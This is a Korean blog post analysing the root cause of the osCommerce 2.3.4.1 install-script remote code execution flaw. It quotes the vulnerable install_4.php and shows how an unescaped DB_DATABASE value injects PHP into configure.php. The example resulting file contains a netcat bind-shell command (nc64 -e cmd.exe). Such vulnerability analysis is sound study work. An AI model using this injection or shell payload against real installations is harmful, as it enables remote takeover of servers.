외로운 Nova의 작업실
osCommerce 2.3.4.1 - Remote Code Execution 3(취약점 원인 분석) 본문
Server Penetesting/Exploit-db
osCommerce 2.3.4.1 - Remote Code Execution 3(취약점 원인 분석)
Nova_ 2023. 4. 3. 17:12- 취약점의 원인 분석
원인은 Apache24\htdocs\oscommerce\catalog\install\templates\pages\install_4.php 파일에서 나타납니다.
<?php
/*
$Id$
osCommerce, Open Source E-Commerce Solutions
http://www.oscommerce.com
Copyright (c) 2014 osCommerce
Released under the GNU General Public License
*/
require('../includes/database_tables.php');
osc_db_connect(trim($HTTP_POST_VARS['DB_SERVER']), trim($HTTP_POST_VARS['DB_SERVER_USERNAME']), trim($HTTP_POST_VARS['DB_SERVER_PASSWORD']));
osc_db_select_db(trim($HTTP_POST_VARS['DB_DATABASE']));
osc_db_query('update ' . TABLE_CONFIGURATION . ' set configuration_value = "' . trim($HTTP_POST_VARS['CFG_STORE_NAME']) . '" where configuration_key = "STORE_NAME"');
osc_db_query('update ' . TABLE_CONFIGURATION . ' set configuration_value = "' . trim($HTTP_POST_VARS['CFG_STORE_OWNER_NAME']) . '" where configuration_key = "STORE_OWNER"');
osc_db_query('update ' . TABLE_CONFIGURATION . ' set configuration_value = "' . trim($HTTP_POST_VARS['CFG_STORE_OWNER_EMAIL_ADDRESS']) . '" where configuration_key = "STORE_OWNER_EMAIL_ADDRESS"');
if (!empty($HTTP_POST_VARS['CFG_STORE_OWNER_NAME']) && !empty($HTTP_POST_VARS['CFG_STORE_OWNER_EMAIL_ADDRESS'])) {
osc_db_query('update ' . TABLE_CONFIGURATION . ' set configuration_value = "\"' . trim($HTTP_POST_VARS['CFG_STORE_OWNER_NAME']) . '\" <' . trim($HTTP_POST_VARS['CFG_STORE_OWNER_EMAIL_ADDRESS']) . '>" where configuration_key = "EMAIL_FROM"');
} else {
osc_db_query('update ' . TABLE_CONFIGURATION . ' set configuration_value = "' . trim($HTTP_POST_VARS['CFG_STORE_OWNER_EMAIL_ADDRESS']) . '" where configuration_key = "EMAIL_FROM"');
}
if ( !empty($HTTP_POST_VARS['CFG_ADMINISTRATOR_USERNAME']) ) {
$check_query = osc_db_query('select user_name from ' . TABLE_ADMINISTRATORS . ' where user_name = "' . trim($HTTP_POST_VARS['CFG_ADMINISTRATOR_USERNAME']) . '"');
if (osc_db_num_rows($check_query)) {
osc_db_query('update ' . TABLE_ADMINISTRATORS . ' set user_password = "' . osc_encrypt_password(trim($HTTP_POST_VARS['CFG_ADMINISTRATOR_PASSWORD'])) . '" where user_name = "' . trim($HTTP_POST_VARS['CFG_ADMINISTRATOR_USERNAME']) . '"');
} else {
osc_db_query('insert into ' . TABLE_ADMINISTRATORS . ' (user_name, user_password) values ("' . trim($HTTP_POST_VARS['CFG_ADMINISTRATOR_USERNAME']) . '", "' . osc_encrypt_password(trim($HTTP_POST_VARS['CFG_ADMINISTRATOR_PASSWORD'])) . '")');
}
}
osc_db_query('update ' . TABLE_CONFIGURATION . ' set configuration_value = "' . trim($HTTP_POST_VARS['CFG_STORE_OWNER_EMAIL_ADDRESS']) . '" where configuration_key = "MODULE_PAYMENT_PAYPAL_EXPRESS_SELLER_ACCOUNT"');
?>
<div class="mainBlock">
<div class="stepsBox">
<ol>
<li>Database Server</li>
<li>Web Server</li>
<li>Online Store Settings</li>
<li style="font-weight: bold;">Finished!</li>
</ol>
</div>
<h1>New Installation</h1>
<p>This web-based installation routine will correctly setup and configure osCommerce Online Merchant to run on this server.</p>
<p>Please follow the on-screen instructions that will take you through the database server, web server, and store configuration options. If help is needed at any stage, please consult the documentation or seek help at the community support forums.</p>
</div>
<div class="contentBlock">
<div class="infoPane">
<h3>Step 4: Finished!</h3>
<div class="infoPaneContents">
<p>Congratulations on installing and configuring osCommerce Online Merchant as your online store solution!</p>
<p>We wish you all the best with the success of your online store and welcome you to join and participate in our community.</p>
<p align="right">- The osCommerce Team</p>
</div>
</div>
<div class="contentPane">
<h2>Finished!</h2>
<?php
$dir_fs_document_root = $HTTP_POST_VARS['DIR_FS_DOCUMENT_ROOT'];
if ((substr($dir_fs_document_root, -1) != '\\') && (substr($dir_fs_document_root, -1) != '/')) {
if (strrpos($dir_fs_document_root, '\\') !== false) {
$dir_fs_document_root .= '\\';
} else {
$dir_fs_document_root .= '/';
}
}
osc_db_query('update ' . TABLE_CONFIGURATION . ' set configuration_value = "' . $dir_fs_document_root . 'includes/work/" where configuration_key = "DIR_FS_CACHE"');
osc_db_query('update ' . TABLE_CONFIGURATION . ' set configuration_value = "' . $dir_fs_document_root . 'includes/work/" where configuration_key = "SESSION_WRITE_DIRECTORY"');
if ($handle = opendir($dir_fs_document_root . 'includes/work/')) {
while (false !== ($filename = readdir($handle))) {
if (substr($filename, strrpos($filename, '.')) == '.cache') {
@unlink($dir_fs_document_root . 'includes/work/' . $filename);
}
}
closedir($handle);
}
$http_url = parse_url($HTTP_POST_VARS['HTTP_WWW_ADDRESS']);
$http_server = $http_url['scheme'] . '://' . $http_url['host'];
$http_catalog = $http_url['path'];
if (isset($http_url['port']) && !empty($http_url['port'])) {
$http_server .= ':' . $http_url['port'];
}
if (substr($http_catalog, -1) != '/') {
$http_catalog .= '/';
}
$admin_folder = 'admin';
if (isset($HTTP_POST_VARS['CFG_ADMIN_DIRECTORY']) && !empty($HTTP_POST_VARS['CFG_ADMIN_DIRECTORY']) && osc_is_writable($dir_fs_document_root) && osc_is_writable($dir_fs_document_root . 'admin')) {
$admin_folder = preg_replace('/[^a-zA-Z0-9]/', '', trim($HTTP_POST_VARS['CFG_ADMIN_DIRECTORY']));
if (empty($admin_folder)) {
$admin_folder = 'admin';
}
}
$file_contents = '<?php' . "\n" .
' define(\'HTTP_SERVER\', \'' . $http_server . '\');' . "\n" .
' define(\'HTTPS_SERVER\', \'' . $http_server . '\');' . "\n" .
' define(\'ENABLE_SSL\', false);' . "\n" .
' define(\'HTTP_COOKIE_DOMAIN\', \'\');' . "\n" .
' define(\'HTTPS_COOKIE_DOMAIN\', \'\');' . "\n" .
' define(\'HTTP_COOKIE_PATH\', \'' . $http_catalog . '\');' . "\n" .
' define(\'HTTPS_COOKIE_PATH\', \'' . $http_catalog . '\');' . "\n" .
' define(\'DIR_WS_HTTP_CATALOG\', \'' . $http_catalog . '\');' . "\n" .
' define(\'DIR_WS_HTTPS_CATALOG\', \'' . $http_catalog . '\');' . "\n" .
' define(\'DIR_WS_IMAGES\', \'images/\');' . "\n" .
' define(\'DIR_WS_ICONS\', DIR_WS_IMAGES . \'icons/\');' . "\n" .
' define(\'DIR_WS_INCLUDES\', \'includes/\');' . "\n" .
' define(\'DIR_WS_FUNCTIONS\', DIR_WS_INCLUDES . \'functions/\');' . "\n" .
' define(\'DIR_WS_CLASSES\', DIR_WS_INCLUDES . \'classes/\');' . "\n" .
' define(\'DIR_WS_MODULES\', DIR_WS_INCLUDES . \'modules/\');' . "\n" .
' define(\'DIR_WS_LANGUAGES\', DIR_WS_INCLUDES . \'languages/\');' . "\n\n" .
' define(\'DIR_WS_DOWNLOAD_PUBLIC\', \'pub/\');' . "\n" .
' define(\'DIR_FS_CATALOG\', \'' . $dir_fs_document_root . '\');' . "\n" .
' define(\'DIR_FS_DOWNLOAD\', DIR_FS_CATALOG . \'download/\');' . "\n" .
' define(\'DIR_FS_DOWNLOAD_PUBLIC\', DIR_FS_CATALOG . \'pub/\');' . "\n\n" .
' define(\'DB_SERVER\', \'' . trim($HTTP_POST_VARS['DB_SERVER']) . '\');' . "\n" .
' define(\'DB_SERVER_USERNAME\', \'' . trim($HTTP_POST_VARS['DB_SERVER_USERNAME']) . '\');' . "\n" .
' define(\'DB_SERVER_PASSWORD\', \'' . trim($HTTP_POST_VARS['DB_SERVER_PASSWORD']) . '\');' . "\n" .
' define(\'DB_DATABASE\', \'' . trim($HTTP_POST_VARS['DB_DATABASE']) . '\');' . "\n" .
' define(\'USE_PCONNECT\', \'false\');' . "\n" .
' define(\'STORE_SESSIONS\', \'mysql\');' . "\n";
if (isset($HTTP_POST_VARS['CFG_TIME_ZONE'])) {
$file_contents .= ' define(\'CFG_TIME_ZONE\', \'' . trim($HTTP_POST_VARS['CFG_TIME_ZONE']) . '\');' . "\n";
}
$file_contents .= '?>';
$fp = fopen($dir_fs_document_root . 'includes/configure.php', 'w');
fputs($fp, $file_contents);
fclose($fp);
@chmod($dir_fs_document_root . 'includes/configure.php', 0644);
$file_contents = '<?php' . "\n" .
' define(\'HTTP_SERVER\', \'' . $http_server . '\');' . "\n" .
' define(\'HTTPS_SERVER\', \'' . $http_server . '\');' . "\n" .
' define(\'ENABLE_SSL\', false);' . "\n" .
' define(\'HTTP_COOKIE_DOMAIN\', \'\');' . "\n" .
' define(\'HTTPS_COOKIE_DOMAIN\', \'\');' . "\n" .
' define(\'HTTP_COOKIE_PATH\', \'' . $http_catalog . $admin_folder . '\');' . "\n" .
' define(\'HTTPS_COOKIE_PATH\', \'' . $http_catalog . $admin_folder . '\');' . "\n" .
' define(\'HTTP_CATALOG_SERVER\', \'' . $http_server . '\');' . "\n" .
' define(\'HTTPS_CATALOG_SERVER\', \'' . $http_server . '\');' . "\n" .
' define(\'ENABLE_SSL_CATALOG\', \'false\');' . "\n" .
' define(\'DIR_FS_DOCUMENT_ROOT\', \'' . $dir_fs_document_root . '\');' . "\n" .
' define(\'DIR_WS_ADMIN\', \'' . $http_catalog . $admin_folder . '/\');' . "\n" .
' define(\'DIR_WS_HTTPS_ADMIN\', \'' . $http_catalog . $admin_folder . '/\');' . "\n" .
' define(\'DIR_FS_ADMIN\', \'' . $dir_fs_document_root . $admin_folder . '/\');' . "\n" .
' define(\'DIR_WS_CATALOG\', \'' . $http_catalog . '\');' . "\n" .
' define(\'DIR_WS_HTTPS_CATALOG\', \'' . $http_catalog . '\');' . "\n" .
' define(\'DIR_FS_CATALOG\', \'' . $dir_fs_document_root . '\');' . "\n" .
' define(\'DIR_WS_IMAGES\', \'images/\');' . "\n" .
' define(\'DIR_WS_ICONS\', DIR_WS_IMAGES . \'icons/\');' . "\n" .
' define(\'DIR_WS_CATALOG_IMAGES\', DIR_WS_CATALOG . \'images/\');' . "\n" .
' define(\'DIR_WS_INCLUDES\', \'includes/\');' . "\n" .
' define(\'DIR_WS_BOXES\', DIR_WS_INCLUDES . \'boxes/\');' . "\n" .
' define(\'DIR_WS_FUNCTIONS\', DIR_WS_INCLUDES . \'functions/\');' . "\n" .
' define(\'DIR_WS_CLASSES\', DIR_WS_INCLUDES . \'classes/\');' . "\n" .
' define(\'DIR_WS_MODULES\', DIR_WS_INCLUDES . \'modules/\');' . "\n" .
' define(\'DIR_WS_LANGUAGES\', DIR_WS_INCLUDES . \'languages/\');' . "\n" .
' define(\'DIR_WS_CATALOG_LANGUAGES\', DIR_WS_CATALOG . \'includes/languages/\');' . "\n" .
' define(\'DIR_FS_CATALOG_LANGUAGES\', DIR_FS_CATALOG . \'includes/languages/\');' . "\n" .
' define(\'DIR_FS_CATALOG_IMAGES\', DIR_FS_CATALOG . \'images/\');' . "\n" .
' define(\'DIR_FS_CATALOG_MODULES\', DIR_FS_CATALOG . \'includes/modules/\');' . "\n" .
' define(\'DIR_FS_BACKUP\', DIR_FS_ADMIN . \'backups/\');' . "\n" .
' define(\'DIR_FS_DOWNLOAD\', DIR_FS_CATALOG . \'download/\');' . "\n" .
' define(\'DIR_FS_DOWNLOAD_PUBLIC\', DIR_FS_CATALOG . \'pub/\');' . "\n\n" .
' define(\'DB_SERVER\', \'' . trim($HTTP_POST_VARS['DB_SERVER']) . '\');' . "\n" .
' define(\'DB_SERVER_USERNAME\', \'' . trim($HTTP_POST_VARS['DB_SERVER_USERNAME']) . '\');' . "\n" .
' define(\'DB_SERVER_PASSWORD\', \'' . trim($HTTP_POST_VARS['DB_SERVER_PASSWORD']) . '\');' . "\n" .
' define(\'DB_DATABASE\', \'' . trim($HTTP_POST_VARS['DB_DATABASE']) . '\');' . "\n" .
' define(\'USE_PCONNECT\', \'false\');' . "\n" .
' define(\'STORE_SESSIONS\', \'mysql\');' . "\n";
if (isset($HTTP_POST_VARS['CFG_TIME_ZONE'])) {
$file_contents .= ' define(\'CFG_TIME_ZONE\', \'' . trim($HTTP_POST_VARS['CFG_TIME_ZONE']) . '\');' . "\n";
}
$file_contents .= '?>';
$fp = fopen($dir_fs_document_root . 'admin/includes/configure.php', 'w');
fputs($fp, $file_contents);
fclose($fp);
@chmod($dir_fs_document_root . 'admin/includes/configure.php', 0644);
if ($admin_folder != 'admin') {
@rename($dir_fs_document_root . 'admin', $dir_fs_document_root . $admin_folder);
}
?>
<p>The installation and configuration was successful!</p>
<br />
<table border="0" width="99%" cellspacing="0" cellpadding="0">
<tr>
<td align="right" width="50%" style="padding-right: 30px;"><?php echo osc_draw_button('Online Store', 'cart', $http_server . $http_catalog . 'index.php', 'primary', array('newwindow' => 1)); ?></td>
<td width="50%" style="padding-left: 30px;"><?php echo osc_draw_button('Administration Tool', 'locked', $http_server . $http_catalog . $admin_folder . '/index.php', 'primary', array('newwindow' => 1)); ?></td>
</tr>
</table>
<br />
<h3>Post-Installation Notes</h3>
<p>It is recommended to follow the following post-installation steps to secure your osCommerce Online Merchant online store:</p>
<ol>
<li>Delete the <?php echo $dir_fs_document_root . 'install'; ?> directory.</li>
<?php
if ($admin_folder == 'admin') {
?>
<li>Rename the Administration Tool directory located at <?php echo $dir_fs_document_root . 'admin'; ?>.</li>
<?php
}
if (file_exists($dir_fs_document_root . 'includes/configure.php') && osc_is_writable($dir_fs_document_root . 'includes/configure.php')) {
?>
<li>Set the permissions on <?php echo $dir_fs_document_root . 'includes/configure.php'; ?> to 644 (or 444 if this file is still writable).</li>
<?php
}
if (file_exists($dir_fs_document_root . $admin_folder . '/includes/configure.php') && osc_is_writable($dir_fs_document_root . $admin_folder . '/includes/configure.php')) {
?>
<li>Set the permissions on <?php echo $dir_fs_document_root . $admin_folder . '/includes/configure.php'; ?> to 644 (or 444 if this file is still writable).</li>
<?php
}
?>
<li>Review the directory permissions on the Administration Tool -> Tools -> Security Directory Permissions page.</li>
<li>The Administration Tool should be further protected using htaccess/htpasswd and can be set-up within the Configuration -> Administrators page.</li>
</ol>
</div>
</div>위 코드 중에서 취약한 부분은 아래 코드 부분입니다.
' define(\'DB_DATABASE\', \'' . trim($HTTP_POST_VARS['DB_DATABASE']) . '\');' . "\n" .이 부분은 실제 php를 만들때 아래와 같이 변합니다.
define('DB_DATABASE', '입력한 DB_DATABASE 값'); \n이걸 아래와 같이 변경할 수 있습니다.
define('DB_DATABASE', ''); PAYLOAD; /*'); \n이렇게되면 PAYLOAD가 실제 PHP 파일에서 실행될 수 있습니다. 해당 PHP문은 아래와 같은 코드에 의해
$fp = fopen($dir_fs_document_root . 'includes/configure.php', 'w');
fputs($fp, $file_contents);
fclose($fp);Apache24\htdocs\oscommerce\catalog\install\includes\configure.php에 저장됩니다.
실제 파일을 열어보면 아래와 같습니다.
<?php
define('HTTP_SERVER', '://');
define('HTTPS_SERVER', '://');
define('ENABLE_SSL', false);
define('HTTP_COOKIE_DOMAIN', '');
define('HTTPS_COOKIE_DOMAIN', '');
define('HTTP_COOKIE_PATH', '/');
define('HTTPS_COOKIE_PATH', '/');
define('DIR_WS_HTTP_CATALOG', '/');
define('DIR_WS_HTTPS_CATALOG', '/');
define('DIR_WS_IMAGES', 'images/');
define('DIR_WS_ICONS', DIR_WS_IMAGES . 'icons/');
define('DIR_WS_INCLUDES', 'includes/');
define('DIR_WS_FUNCTIONS', DIR_WS_INCLUDES . 'functions/');
define('DIR_WS_CLASSES', DIR_WS_INCLUDES . 'classes/');
define('DIR_WS_MODULES', DIR_WS_INCLUDES . 'modules/');
define('DIR_WS_LANGUAGES', DIR_WS_INCLUDES . 'languages/');
define('DIR_WS_DOWNLOAD_PUBLIC', 'pub/');
define('DIR_FS_CATALOG', './');
define('DIR_FS_DOWNLOAD', DIR_FS_CATALOG . 'download/');
define('DIR_FS_DOWNLOAD_PUBLIC', DIR_FS_CATALOG . 'pub/');
define('DB_SERVER', '');
define('DB_SERVER_USERNAME', '');
define('DB_SERVER_PASSWORD', '');
define('DB_DATABASE', '');exec("nc64 -l -e cmd.exe -p 8989");/*');
define('USE_PCONNECT', 'false');
define('STORE_SESSIONS', 'mysql');
?>
- 근본적인 원인
이는 설치과정에서 설정값들을 POST 방식으로 php에게 전달하여 단계별로 설치를 진행하는 방법때문에 일어나는 일이라고 생각합니다. POST 방식이 아닌 서버내의 설정파일을 만들어서 해당 설정파일로 각 단계별 설정값들을 전달하면 해당 취약점을 막을 수 있을 것이라고 생각합니다.
'Server Penetesting > Exploit-db' 카테고리의 다른 글
| Elastix 2.2.0 - 'graph.php' Local File Inclusion (0) | 2023.04.24 |
|---|---|
| WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - Privilege Escalation (0) | 2023.04.21 |
| osCommerce 2.3.4.1 - Remote Code Execution 2(실제 Exploit) (0) | 2023.04.03 |
| osCommerce 2.3.4.1 - Remote Code Execution 1(환경 구성) (0) | 2023.03.29 |
'Server Penetesting/Exploit-db' Related Articles
more
Comments